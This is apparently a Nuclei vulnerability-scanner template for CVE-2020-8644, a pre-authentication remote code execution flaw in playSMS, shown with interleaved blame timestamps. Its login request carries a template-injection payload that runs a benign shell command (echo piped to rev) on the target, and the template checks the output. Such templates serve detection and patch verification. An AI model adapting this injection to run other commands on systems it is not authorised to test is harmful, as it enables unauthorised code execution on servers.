2022-07-05 20:39:27 +00:00
id : CVE-2020-8644
info :
2022-07-06 05:01:31 +00:00
name : playSMS - Pre-Authentication Remote Code Execution (CVE-2020-8644)
2022-07-05 20:39:27 +00:00
author : dbrwsky
severity : critical
2022-07-06 05:00:57 +00:00
description : PlaySMS double processes a server-side template, resulting in unauthenticated user control of input to the PlaySMS template engine. The template engine’ s implementation then permits arbitrary code execution.
2022-07-05 20:39:27 +00:00
reference :
- https://research.nccgroup.com/2020/02/11/technical-advisory-playsms-pre-authentication-remote-code-execution-cve-2020-8644/
2022-07-06 04:45:33 +00:00
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8644
2022-07-06 05:00:57 +00:00
- https://playsms.org/2020/02/05/playsms-1-4-3-has-been-released/
2022-07-06 08:55:00 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2020-8644
cwe-id : CWE-74
2022-07-06 05:01:31 +00:00
tags : cve,cve2020,ssti,playsms,rce,unauth
2022-07-05 20:39:27 +00:00
requests :
- raw :
- |
GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1
Host : {{Hostname}}
Origin : {{BaseURL}}
2022-07-06 04:45:33 +00:00
2022-07-05 20:39:27 +00:00
- |
POST /index.php?app=main&inc=core_auth&route=login&op=login HTTP/1.1
Host : {{Hostname}}
Origin : {{BaseURL}}
Content-Type : application/x-www-form-urlencoded
2022-07-06 05:00:57 +00:00
X-CSRF-Token={{csrf}}&username=%7B%7B%60echo%20%27CVE-2020-8644%27%20%7C%20rev%60%7D%7D&password=
2022-07-06 04:45:33 +00:00
2022-07-05 20:39:27 +00:00
cookie-reuse : true
redirects : true
2022-07-06 05:00:57 +00:00
max-redirects : 2
extractors :
- type : xpath
name : csrf
part : body
attribute : value
internal : true
xpath :
- /html/body/div[1]/div/div/table/tbody/tr[2]/td/table/tbody/tr/td/form/input
2022-07-06 04:45:33 +00:00
matchers-condition : and
matchers :
- type : word
part : body
2022-07-06 05:00:57 +00:00
words :
- '4468-0202-EVC'
2022-07-06 04:45:33 +00:00
- type : status
status :
- 200